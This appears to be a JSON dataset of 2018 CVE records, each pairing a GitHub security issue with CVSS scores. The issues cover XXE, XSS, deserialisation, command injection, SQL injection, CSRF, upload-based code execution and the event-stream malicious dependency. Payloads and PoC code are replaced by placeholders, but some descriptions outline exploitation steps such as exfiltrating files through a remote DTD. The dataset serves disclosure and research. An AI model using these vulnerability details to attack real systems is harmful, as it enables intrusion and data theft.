    {
        "CVE_ID": "CVE-2018-1000815",
        "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/15232",
        "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/15232",
        "Repo_new": "brave/browser-laptop",
        "Issue_Created_At": "2018-09-26T20:35:59Z",
        "description": "[hackerone NUMBERTAG noscript issue. URLTAG verified in latest release",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000816",
        "Issue_Url_old": "https://github.com/grafana/grafana/issues/13667",
        "Issue_Url_new": "https://github.com/grafana/grafana/issues/13667",
        "Repo_new": "grafana/grafana",
        "Issue_Created_At": "2018-10-14T14:55:27Z",
        "description": "stored xss in grafana query editor. Dear Grafana Team \u2013 I have found a persistent xss in Grafana's query editor for Graphite and Influxdb. The xss is triggered when clicking the field in the query editor's \"FROM\" row in which the payload NUMBERTAG was previously inserted. I checked this vulnerability version NUMBERTAG and version NUMBERTAG both on Ubuntu NUMBERTAG I attached this short screencast to make it easy to reproduce the behaviour APITAG Grafana APITAG URLTAG NUMBERTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-1000817",
        "Issue_Url_old": "https://github.com/grails/grails-core/issues/11068",
        "Issue_Url_new": "https://github.com/grails/grails-core/issues/11068",
        "Repo_new": "grails/grails-core",
        "Issue_Created_At": "2018-08-17T09:45:15Z",
        "description": "File reading vulnerability. Hi, grails has a file reading vulnerability which can read source code (java bytecode) of affected applications. This flaw needs the grails packed to war, and the application is running on the jetty. Reproduce NUMBERTAG Create a helloworld application and a helloworld controller NUMBERTAG Modify APITAG line NUMBERTAG from APITAG to APITAG NUMBERTAG Build a war file NUMBERTAG Deploy the application to jetty NUMBERTAG Send a crafted request: APITAG . Expected Behaviour ERRORTAG or NUMBERTAG Actual Behaviour FILETAG Environment Information Operating System : Windows Grails Version: the latest version JDK Version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000821",
        "Issue_Url_old": "https://github.com/mkulesh/microMathematics/issues/79",
        "Issue_Url_new": "https://github.com/mkulesh/micromathematics/issues/79",
        "Repo_new": "mkulesh/micromathematics",
        "Issue_Created_At": "2018-09-29T09:32:28Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000822",
        "Issue_Url_old": "https://github.com/codelibs/fess/issues/1851",
        "Issue_Url_new": "https://github.com/codelibs/fess/issues/1851",
        "Repo_new": "codelibs/fess",
        "Issue_Created_At": "2018-09-29T09:59:12Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000823",
        "Issue_Url_old": "https://github.com/eXist-db/exist/issues/2180",
        "Issue_Url_new": "https://github.com/exist-db/exist/issues/2180",
        "Repo_new": "exist-db/exist",
        "Issue_Created_At": "2018-09-29T10:37:37Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG The insecure XML parsing is used within the REST server in the following code: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000824",
        "Issue_Url_old": "https://github.com/MegaMek/megamek/issues/1162",
        "Issue_Url_new": "https://github.com/megamek/megamek/issues/1162",
        "Repo_new": "megamek/megamek",
        "Issue_Created_At": "2018-09-29T13:10:17Z",
        "description": "Object Deserialisation Vulnerability in APITAG The Issue Object Deserialization Injection attacks utilise overly trusted user controlled input, passed to deserialisation functions. The deserialisation of objects can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code within the APITAG project, where the user input is passed into the deserialisation function: URLTAG The above code can be manipulated by specially crafted network packets.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000825",
        "Issue_Url_old": "https://github.com/FreeCol/freecol/issues/26",
        "Issue_Url_new": "https://github.com/freecol/freecol/issues/26",
        "Repo_new": "freecol/freecol",
        "Issue_Created_At": "2018-09-29T13:28:33Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000826",
        "Issue_Url_old": "https://github.com/microweber/microweber/issues/489",
        "Issue_Url_new": "https://github.com/microweber/microweber/issues/489",
        "Repo_new": "microweber/microweber",
        "Issue_Created_At": "2018-09-29T14:47:53Z",
        "description": "XSS in FILETAG . The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occurred The code below displays the user controlled variable without sufficient sanitisation: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000827",
        "Issue_Url_old": "https://github.com/nightflyza/Ubilling/issues/330",
        "Issue_Url_new": "https://github.com/nightflyza/ubilling/issues/330",
        "Repo_new": "nightflyza/ubilling",
        "Issue_Created_At": "2018-09-29T14:53:07Z",
        "description": "Object Deserialisation Vulnerability in FILETAG . The Issue Object Deserialization Injection attacks utilise overly trusted user controlled input, passed to deserialisation functions. The deserialisation of objects can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code where the user input is passed into the deserialisation function: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000828",
        "Issue_Url_old": "https://github.com/frostwire/frostwire/issues/829",
        "Issue_Url_new": "https://github.com/frostwire/frostwire/issues/829",
        "Repo_new": "frostwire/frostwire",
        "Issue_Created_At": "2018-09-29T15:04:55Z",
        "description": "XXE in APITAG via Man in the Middle APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG An attacker can Man in the Middle APITAG the HTTP call to the URL below: URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-1000829",
        "Issue_Url_old": "https://github.com/dmsl/anyplace/issues/263",
        "Issue_Url_new": "https://github.com/dmsl/anyplace/issues/263",
        "Repo_new": "dmsl/anyplace",
        "Issue_Created_At": "2018-09-30T02:47:20Z",
        "description": "XXE in APITAG via Man in the Middle APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG An attacker can Man in the Middle APITAG the HTTP call to the URL below: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-1000830",
        "Issue_Url_old": "https://github.com/goxr3plus/XR3Player/issues/9",
        "Issue_Url_new": "https://github.com/goxr3plus/xr3player/issues/9",
        "Repo_new": "goxr3plus/xr3player",
        "Issue_Created_At": "2018-10-24T11:05:34Z",
        "description": "XXE in Playlist Parsers. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of documentbuilderfactory without securely disabling entities: URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000831",
        "Issue_Url_old": "https://github.com/k9mail/k-9/issues/3681",
        "Issue_Url_new": "https://github.com/thundernest/k-9/issues/3681",
        "Repo_new": "thundernest/k-9",
        "Issue_Created_At": "2018-10-24T11:12:53Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of saxparserfactory without securely disabling entities: URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000832",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2271",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2271",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2018-10-24T11:29:17Z",
        "description": "Command Injection in FILETAG . The Issue Command injection is an attack which uses overly trusting user controlled input, when performing operating system commands from within the application. This allows an attacker to perform unauthorised operating system commands on the target server. Where the Issue Occurred URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000833",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2272",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2272",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2018-10-24T11:31:14Z",
        "description": "Command Injection in FILETAG . The Issue Command injection is an attack which uses overly trusting user controlled input, when performing operating system commands from within the application. This allows an attacker to perform unauthorised operating system commands on the target server. Where the Issue Occurred: URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000834",
        "Issue_Url_old": "https://github.com/runelite/runelite/issues/6160",
        "Issue_Url_new": "https://github.com/runelite/runelite/issues/6160",
        "Repo_new": "runelite/runelite",
        "Issue_Created_At": "2018-10-24T11:43:43Z",
        "description": "XXE via Man in the Middle in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: Insecure XML parsers are used below: URLTAG Communication over HTTP may allow an attacker to edit a server's response and perform XXE attacks. The HTTP URL is displayed below: URLTAG Remediation Perform communications over HTTPS",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-1000835",
        "Issue_Url_old": "https://github.com/Kunzisoft/KeePassDX/issues/200",
        "Issue_Url_new": "https://github.com/kunzisoft/keepassdx/issues/200",
        "Repo_new": "kunzisoft/keepassdx",
        "Issue_Created_At": "2018-10-24T11:48:44Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000836",
        "Issue_Url_old": "https://github.com/Bedework/bw-calendar-engine/issues/3",
        "Issue_Url_new": "https://github.com/bedework/bw-calendar-engine/issues/3",
        "Repo_new": "bedework/bw-calendar-engine",
        "Issue_Created_At": "2018-10-24T11:54:22Z",
        "description": "XXE via APITAG / Malicious Server in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-1000837",
        "Issue_Url_old": "https://github.com/ObeoNetwork/UML-Designer/issues/1035",
        "Issue_Url_new": "https://github.com/obeonetwork/uml-designer/issues/1035",
        "Repo_new": "obeonetwork/uml-designer",
        "Issue_Created_At": "2018-10-24T11:58:27Z",
        "description": "XXE in APITAG via FILETAG file. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000838",
        "Issue_Url_old": "https://github.com/sleuthkit/autopsy/issues/4236",
        "Issue_Url_new": "https://github.com/sleuthkit/autopsy/issues/4236",
        "Repo_new": "sleuthkit/autopsy",
        "Issue_Created_At": "2018-10-25T04:59:50Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: URLTAG Remediation URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000839",
        "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1223",
        "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1223",
        "Repo_new": "librehealthio/lh-ehr",
        "Issue_Created_At": "2018-08-11T06:30:11Z",
        "description": "Security issue: Remote code execution via user picture upload. The Issue Arbitrary file upload vulnerability allowing any user who can set profile pictures to be able to execute code on the hosting system. In lh ehr, an attacker must be authenticated, and have sufficient privileges to upload a user profile picture (either for a user, or a patient) to perform this attack. It appears any valid user can perform this. Issue location Occurs at URLTAG POC: ERRORTAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000840",
        "Issue_Url_old": "https://github.com/processing/processing/issues/5706",
        "Issue_Url_new": "https://github.com/processing/processing/issues/5706",
        "Repo_new": "processing/processing",
        "Issue_Created_At": "2018-11-13T15:42:43Z",
        "description": "XXE in APITAG . Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data since it allows arbitrary file inclusion in the XML and the automated execution of HTTP request (which can be used to exfiltrate the included data) during the parsing of the XML. Steps to reproduce Example Processing script CODETAG Example XML file CODETAG Example remote DTD (as stored at the url referenced above) CODETAG Further clarification The proof of concept provided above retrieves from the remote server the DTD specification. During the execution of APITAG the DTD is then parsed, reading in the example the content of PATHTAG The content of the file is than transmitted through an HTTP request (row NUMBERTAG of the DTD) to the remote server, that returns the content of $_REQUEST, providing the console output. Remediation URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000842",
        "Issue_Url_old": "https://github.com/asteinhauser/fat_free_crm/issues/1",
        "Issue_Url_new": "https://github.com/asteinhauser/fat_free_crm/issues/1",
        "Repo_new": "asteinhauser/fat_free_crm",
        "Issue_Created_At": "2018-10-26T23:58:10Z",
        "description": "Context sensitive XSS discovery. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000846",
        "Issue_Url_old": "https://github.com/funzoneq/freshdns/issues/7",
        "Issue_Url_new": "https://github.com/funzoneq/freshdns/issues/7",
        "Repo_new": "funzoneq/freshdns",
        "Issue_Created_At": "2018-11-07T18:03:34Z",
        "description": "XSRF vulnerability. I noticed that APITAG is vulnerable to Cross Site Request Forgery URLTAG , allowing an attacker to e.g. delete all zones on your server if they can get you to load a website containing their javascript while you're logged in to APITAG in the same browser. It is fixed (hopefully) in my merge request NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000847",
        "Issue_Url_old": "https://github.com/funzoneq/freshdns/issues/16",
        "Issue_Url_new": "https://github.com/funzoneq/freshdns/issues/16",
        "Repo_new": "funzoneq/freshdns",
        "Issue_Created_At": "2018-11-14T21:12:24Z",
        "description": "XSS vulnerability. I tried to fix all XSS vulnerabilities in commit APITAG hopefully I found all problematic places but probably I lost some. An user could have put something like APITAG in their username. As soon as the admin opens the User List, the script code would be run within the admin's session.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-1000851",
        "Issue_Url_old": "https://github.com/bitpay/copay/issues/9346",
        "Issue_Url_new": "https://github.com/bitpay/copay/issues/9346",
        "Repo_new": "bitpay/copay",
        "Issue_Created_At": "2018-11-26T18:36:52Z",
        "description": "APITAG dependency attack steals wallets from users of copay. URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000851",
        "Issue_Url_old": "https://github.com/dominictarr/event-stream/issues/116",
        "Issue_Url_new": "https://github.com/dominictarr/event-stream/issues/116",
        "Repo_new": "dominictarr/event-stream",
        "Issue_Created_At": "2018-11-20T21:26:01Z",
        "description": "I don't know what to say.. MENTIONTAG Why was MENTIONTAG given access to this repo? He added flatmap stream URLTAG which is entirely NUMBERTAG commit to the repo but has NUMBERTAG ersions, the latest one removes the injection, unmaintained, created NUMBERTAG months ago) an injection targeting ps tree URLTAG . After he adds it at almost the exact same time the injection is added to APITAG , he bumps the version and publishes. Literally the second commit NUMBERTAG days later) after that he removes the injection and bumps a major version so he can clear the repo of having APITAG but still have everyone (millions of weekly installs) using NUMBERTAG affected. MENTIONTAG If you removed flatmap stream because your realized it was an injection attack why didn't you yank APITAG from npm and put a PSA? If you didn't know, why did you choose to use a completely unused/unknown library NUMBERTAG downloads on npm until you use it)? If I had the exact date from npm in which APITAG was published I wouldn't be asking you questions. I've included a break down of what I have so far on APITAG below. It includes the portion of code not found in the unminified source of APITAG but found in the minified source. The code has been cleaned up a little to get a better understanding. The worst part is I still don't even know what this does... The decrypted data n NUMBERTAG is byte code or something, not regular javascript, or maybe I'm just not handling it correctly. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000852",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/4866",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/4866",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2018-09-19T05:11:35Z",
        "description": "I Found Memory Leak Vulnerability. freerdp NUMBERTAG rc3 has a memory leak vulnerability that can read the client's memory. This vulnerability occurs in channels / drdynvc / client / drdynvc_main.c. Please email me if you need more details. EMAILTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000854",
        "Issue_Url_old": "https://github.com/esigate/esigate/issues/209",
        "Issue_Url_new": "https://github.com/esigate/esigate/issues/209",
        "Repo_new": "esigate/esigate",
        "Issue_Created_At": "2018-10-19T15:31:39Z",
        "description": "Injection in XSLT parser : switch to secure mode. APITAG supports APITAG tag along with the stylesheet attribute. This attribute can be a remote XSLT. This feature can allow an attacker to execute code on the remote server. We have to switch the XSLT parser to secure mode in order to prevent execution of malicious commands inserted in stylesheets. This bug was found by Benoit C\u00f4t\u00e9 Jodoin and reported by Philippe Arteau from APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000855",
        "Issue_Url_old": "https://github.com/basecamp/easymon/issues/26",
        "Issue_Url_new": "https://github.com/basecamp/easymon/issues/26",
        "Repo_new": "basecamp/easymon",
        "Issue_Created_At": "2018-11-09T12:19:38Z",
        "description": "Possible reflected XSS in Firefox when fetching an invalid check name. When passing an invalid check name to APITAG , an exception is raised, resulting in a NUMBERTAG response with the following body: APITAG Firefox renders that body, and if the name includes any APITAG code via APITAG tags, it'll be executed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000856",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/80",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/80",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-11-20T05:06:31Z",
        "description": "Stored XSS vulnerability in Segment Name . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Poc: Segment Name POST FILETAG Request Body: APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-1000860",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2338",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2338",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2018-11-29T16:24:40Z",
        "description": "XSS in phpipamredirect cookie. Setting the value of phpipamredirect to APITAG results in XSS when the value is copied to a tag here: CODETAG Proof on demo: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 2.7,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-1000869",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2344",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2344",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2018-12-03T16:48:07Z",
        "description": "Blind SQL Injection ( PATHTAG ). In parameter object_type in the file PATHTAG at line NUMBERTAG APITAG APITAG CODETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000870",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2326",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2326",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2018-11-21T20:35:58Z",
        "description": "XSS APITAG in PATHTAG (CSRF too: PATHTAG ). APITAG in PATHTAG is vulnerable to XSS. Poc1: Attacker user: Change theme parameter in user settings. APITAG APITAG Victim: View attacker user in admin panel APITAG FILETAG Poc2: PATHTAG is vulnerable to CSRF. An attacker can create a page with the following snippet and cause any user to change their settings and later trigger the XSS vuln. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-1000873",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-modules-java8/issues/90",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-modules-java8/issues/90",
        "Repo_new": "fasterxml/jackson-modules-java8",
